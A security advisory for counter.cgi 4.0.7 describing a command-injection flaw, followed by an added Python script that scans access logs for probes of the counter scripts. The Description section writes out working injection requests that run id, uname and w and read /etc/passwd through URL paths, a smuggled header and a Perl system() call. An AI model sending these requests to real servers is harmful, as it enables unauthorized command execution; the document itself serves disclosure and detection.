
Counter.cgi 4.0.7 execute arbitrary code



Vulnerability

    counter.cgi

Affected

    CGI counter 4.0.7 by George Burgyan

Description

    Howard M. Kash III found the following. The popular CGI web page
    access counter version 4.0.7 by George Burgyan allows execution
    of arbitrary commands due to unchecked user input. Commands are
    executed with the same privilege as the web server. Of course,
    other exploits can be used to get root access on an unpatched OS.

    The counter consists of a Perl script called "counter", and
    multiple links to counter called counter-ord, counterfiglet,
    counterfiglet-ord, counterbanner, and counterbanner-ord. The
    following examples illustrate how they can be exploited:

        Using straight URL: http://web-server/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id
        Passing commands in a variable:
         > telnet web-server www
         GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
         X: pwd;ls -la /etc;cat /etc/passwd

         > telnet web-server www
         GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
         X: echo;id;uname -a;w

Solution

    The counter was last updated in 1995, so it is probably no longer
    supported. Links and email addresses referenced in the source
    code are no longer valid. However, it appears to still be widely
    used, based on the number of references returned by search engine
    queries.
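
    Since no fix is available, one way to find out whether an installed
    copy has been probed is to scan the web server access log for requests
    to the counter scripts whose path options contain anything but plain
    option characters. This is an added example, not part of the original
    advisory; the /cgi-bin/ prefix is taken from the URLs above, and the
    allow-list, the Common Log Format layout and the sample log lines are
    assumptions.

```python
import re
from urllib.parse import unquote

# Script names listed in the advisory (the "counter" script and its links).
SCRIPTS = {"counter", "counter-ord", "counterfiglet", "counterfiglet-ord",
           "counterbanner", "counterbanner-ord"}
# Assumption: legitimate option strings need only these characters.
SAFE_PATH_INFO = re.compile(r"[A-Za-z0-9/=_.-]*")
# Request and status fields of a Common Log Format line (assumed layout).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.*) HTTP/\d\.\d" \d{3}')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [01/Jan/2000:00:00:02 +0000] '
    '"GET /cgi-bin/counter/nl/ord/lang=english HTTP/1.0" 200 64',
    '192.0.2.44 - - [01/Jan/2000:00:03:10 +0000] '
    '"GET /cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id HTTP/1.0" 200 301',
    '192.0.2.44 - - [01/Jan/2000:00:03:15 +0000] '
    '"GET /cgi-bin/counter-ord/nc/f=%253Bid HTTP/1.0" 200 88',
]

def suspicious_counter_requests(log_lines):
    """Return (line_number, decoded_path_info) for requests to a counter
    script whose PATH_INFO has characters outside the allow-list."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        parts = m.group("target").split("?", 1)[0].split("/")
        # Expect /cgi-bin/<script>/<path info...>
        if len(parts) < 3 or parts[1] != "cgi-bin" or unquote(parts[2]) not in SCRIPTS:
            continue
        # Decode twice so double-encoded metacharacters are also seen.
        info = unquote(unquote("/".join(parts[3:])))
        if not SAFE_PATH_INFO.fullmatch(info):
            hits.append((n, info))
    return hits

if __name__ == "__main__":
    for n, info in suspicious_counter_requests(SAMPLE):
        print(f"line {n}: suspicious PATH_INFO {info!r}")
```

    A Common Log Format line records the request line but not arbitrary
    request headers, so for the header-based variants shown above only
    the URL portion of the request is visible to this check.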

